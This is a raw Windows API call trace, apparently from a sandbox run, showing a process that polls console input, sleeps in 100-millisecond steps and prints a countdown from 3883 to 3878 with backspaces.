[0202.606] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0202.606] Sleep (dwMilliseconds=0x64)
[0202.716] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.716] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0202.716] Sleep (dwMilliseconds=0x64)
[0202.825] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.825] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0202.825] Sleep (dwMilliseconds=0x64)
[0202.934] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0202.934] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0202.934] Sleep (dwMilliseconds=0x64)
[0203.043] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.043] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0203.043] Sleep (dwMilliseconds=0x64)
[0203.152] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.153] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0203.153] Sleep (dwMilliseconds=0x64)
[0203.261] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.262] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0203.262] Sleep (dwMilliseconds=0x64)
[0203.371] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.371] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6025
[0203.371] Sleep (dwMilliseconds=0x64)
[0203.480] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.482] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0203.482] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083883") returned 8
[0203.482] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0203.482] __iob_func () returned 0x757a2900
[0203.482] _fileno (_File=0x757a2920) returned 1
[0203.482] _errno () returned 0x5507d8
[0203.482] _get_osfhandle (_FileHandle=1) returned 0x4c
[0203.482] _errno () returned 0x5507d8
[0203.483] GetFileType (hFile=0x4c) returned 0x2
[0203.483] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0203.483] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0203.483] lstrlenW (lpString="\x08\x08\x08\x083883") returned 8
[0203.483] GetConsoleOutputCP () returned 0x1b5
[0203.483] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083883", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0203.483] GetConsoleOutputCP () returned 0x1b5
[0203.483] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083883", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083883", lpUsedDefaultChar=0x0) returned 8
[0203.483] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0203.483] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0203.483] Sleep (dwMilliseconds=0x64)
[0203.589] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.589] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0203.589] Sleep (dwMilliseconds=0x64)
[0203.699] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.699] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0203.699] Sleep (dwMilliseconds=0x64)
[0203.807] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.808] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0203.808] Sleep (dwMilliseconds=0x64)
[0203.917] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0203.917] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0203.917] Sleep (dwMilliseconds=0x64)
[0204.026] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.026] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0204.026] Sleep (dwMilliseconds=0x64)
[0204.135] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.135] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0204.135] Sleep (dwMilliseconds=0x64)
[0204.247] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.247] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0204.247] Sleep (dwMilliseconds=0x64)
[0204.354] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.354] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6026
[0204.354] Sleep (dwMilliseconds=0x64)
[0204.463] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.463] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0204.463] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083882") returned 8
[0204.463] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0204.463] __iob_func () returned 0x757a2900
[0204.463] _fileno (_File=0x757a2920) returned 1
[0204.463] _errno () returned 0x5507d8
[0204.463] _get_osfhandle (_FileHandle=1) returned 0x4c
[0204.463] _errno () returned 0x5507d8
[0204.463] GetFileType (hFile=0x4c) returned 0x2
[0204.463] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0204.463] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0204.464] lstrlenW (lpString="\x08\x08\x08\x083882") returned 8
[0204.464] GetConsoleOutputCP () returned 0x1b5
[0204.464] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083882", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0204.464] GetConsoleOutputCP () returned 0x1b5
[0204.464] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083882", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083882", lpUsedDefaultChar=0x0) returned 8
[0204.464] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0204.464] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0204.464] Sleep (dwMilliseconds=0x64)
[0204.574] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.574] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0204.574] Sleep (dwMilliseconds=0x64)
[0204.681] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.681] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0204.681] Sleep (dwMilliseconds=0x64)
[0204.790] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.791] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0204.791] Sleep (dwMilliseconds=0x64)
[0204.899] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0204.900] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0204.900] Sleep (dwMilliseconds=0x64)
[0205.009] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.009] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0205.009] Sleep (dwMilliseconds=0x64)
[0205.118] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.118] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0205.118] Sleep (dwMilliseconds=0x64)
[0205.227] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.228] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0205.228] Sleep (dwMilliseconds=0x64)
[0205.337] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.337] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0205.337] Sleep (dwMilliseconds=0x64)
[0205.445] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.446] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6027
[0205.446] Sleep (dwMilliseconds=0x64)
[0205.555] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.555] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0205.555] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083881") returned 8
[0205.555] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0205.555] __iob_func () returned 0x757a2900
[0205.555] _fileno (_File=0x757a2920) returned 1
[0205.555] _errno () returned 0x5507d8
[0205.555] _get_osfhandle (_FileHandle=1) returned 0x4c
[0205.555] _errno () returned 0x5507d8
[0205.555] GetFileType (hFile=0x4c) returned 0x2
[0205.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0205.555] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0205.555] lstrlenW (lpString="\x08\x08\x08\x083881") returned 8
[0205.664] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.664] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0205.664] Sleep (dwMilliseconds=0x64)
[0205.774] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.774] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0205.774] Sleep (dwMilliseconds=0x64)
[0205.882] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.882] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0205.882] Sleep (dwMilliseconds=0x64)
[0205.991] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0205.992] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0205.992] Sleep (dwMilliseconds=0x64)
[0206.104] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.104] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0206.104] Sleep (dwMilliseconds=0x64)
[0206.220] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.220] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0206.220] Sleep (dwMilliseconds=0x64)
[0206.335] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.335] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6028
[0206.335] Sleep (dwMilliseconds=0x64)
[0206.475] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.475] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0206.475] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083880") returned 8
[0206.475] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0206.475] __iob_func () returned 0x757a2900
[0206.475] _fileno (_File=0x757a2920) returned 1
[0206.475] _errno () returned 0x5507d8
[0206.475] _get_osfhandle (_FileHandle=1) returned 0x4c
[0206.475] _errno () returned 0x5507d8
[0206.475] GetFileType (hFile=0x4c) returned 0x2
[0206.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0206.475] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0206.476] lstrlenW (lpString="\x08\x08\x08\x083880") returned 8
[0206.615] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.616] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0206.616] Sleep (dwMilliseconds=0x64)
[0206.724] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.725] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0206.725] Sleep (dwMilliseconds=0x64)
[0206.868] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.868] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0206.868] Sleep (dwMilliseconds=0x64)
[0206.974] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0206.974] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0206.974] Sleep (dwMilliseconds=0x64)
[0207.083] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.084] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0207.084] Sleep (dwMilliseconds=0x64)
[0207.192] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.193] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0207.193] Sleep (dwMilliseconds=0x64)
[0207.302] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.302] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0207.302] Sleep (dwMilliseconds=0x64)
[0207.411] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.411] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6029
[0207.411] Sleep (dwMilliseconds=0x64)
[0207.520] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.520] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0207.520] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083879") returned 8
[0207.520] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0207.520] __iob_func () returned 0x757a2900
[0207.520] _fileno (_File=0x757a2920) returned 1
[0207.521] _errno () returned 0x5507d8
[0207.521] _get_osfhandle (_FileHandle=1) returned 0x4c
[0207.521] _errno () returned 0x5507d8
[0207.521] GetFileType (hFile=0x4c) returned 0x2
[0207.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0207.521] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0207.521] lstrlenW (lpString="\x08\x08\x08\x083879") returned 8
[0207.629] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.630] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0207.630] Sleep (dwMilliseconds=0x64)
[0207.739] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.739] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0207.739] Sleep (dwMilliseconds=0x64)
[0207.848] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.848] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0207.848] Sleep (dwMilliseconds=0x64)
[0207.957] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0207.958] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0207.958] Sleep (dwMilliseconds=0x64)
[0208.066] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.066] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0208.066] Sleep (dwMilliseconds=0x64)
[0208.176] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.176] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0208.176] Sleep (dwMilliseconds=0x64)
[0208.286] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.287] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0208.287] Sleep (dwMilliseconds=0x64)
[0208.394] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.394] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602a
[0208.394] Sleep (dwMilliseconds=0x64)
[0208.503] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.503] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0208.503] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083878") returned 8
[0208.503] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0208.504] __iob_func () returned 0x757a2900
[0208.504] _fileno (_File=0x757a2920) returned 1
[0208.504] _errno () returned 0x5507d8
[0208.504] _get_osfhandle (_FileHandle=1) returned 0x4c
[0208.504] _errno () returned 0x5507d8
[0208.504] GetFileType (hFile=0x4c) returned 0x2
[0208.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0208.504] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0208.504] lstrlenW (lpString="\x08\x08\x08\x083878") returned 8
[0208.613] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.613] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0208.613] Sleep (dwMilliseconds=0x64)
[0208.721] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.721] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0208.721] Sleep (dwMilliseconds=0x64)
[0208.831] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.831] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0208.831] Sleep (dwMilliseconds=0x64)
[0208.940] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0208.940] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0208.940] Sleep (dwMilliseconds=0x64)
[0209.049] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.049] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0209.049] Sleep (dwMilliseconds=0x64)
[0209.158] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.158] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0209.158] Sleep (dwMilliseconds=0x64)
[0209.302] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.303] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0209.303] Sleep (dwMilliseconds=0x64)
[0209.439] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.439] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602b
[0209.439] Sleep (dwMilliseconds=0x64)
